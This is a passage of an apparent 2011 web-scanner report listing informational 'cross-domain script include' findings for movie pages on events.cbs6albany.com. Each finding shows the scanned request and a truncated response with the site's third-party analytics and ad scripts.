Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:56 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 23
ETag: "4ef5810659546a41c2a2ffc993f50066"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:48:56 GMT; HttpOnly
Content-Length: 32331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.187. http://events.cbs6albany.com/movies/show/261885-127-hours

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/261885-127-hours

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /movies/show/261885-127-hours HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:50:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 58
ETag: "4189f6318e7b101eb2afa6e46fc4f736"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:50:13 GMT; HttpOnly
Content-Length: 41025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.188. http://events.cbs6albany.com/movies/show/272945-black-swan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/272945-black-swan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /movies/show/272945-black-swan HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:52:04 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 63
ETag: "887c6d16534b4c03430b9c91385c5372"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:52:04 GMT; HttpOnly
Content-Length: 41238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.189. http://events.cbs6albany.com/movies/show/299065-the-kings-speech

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/299065-the-kings-speech

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /movies/show/299065-the-kings-speech HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:49:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 56
ETag: "92eedb6097f569ba7eaf95f8f4e3377b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:49:13 GMT; HttpOnly
Content-Length: 40321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.190. http://events.cbs6albany.com/movies/show/324545-true-grit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/324545-true-grit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /movies/show/324545-true-grit HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:49:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 72
ETag: "7070a00b9b4c8cf207ab895fc99d71b7"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:49:35 GMT; HttpOnly
Content-Length: 42406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.191. http://events.cbs6albany.com/movies/show/344645-no-strings-attached

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/344645-no-strings-attached

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /movies/show/344645-no-strings-attached HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:50:17 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 91
ETag: "89b454a0c7d60ad91ba29817475d17e8"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:50:17 GMT; HttpOnly
Content-Length: 42633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.192. http://events.cbs6albany.com/movies/show/346845-sanctum-3d

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/346845-sanctum-3d

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /movies/show/346845-sanctum-3d HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:50:29 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 164
ETag: "e1c13c5d9acfe1ce94e35c26fe8ca0d5"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:50:29 GMT; HttpOnly
Content-Length: 41680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.193. http://events.cbs6albany.com/movies/show/354805-sanctum

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/354805-sanctum

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /movies/show/354805-sanctum HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
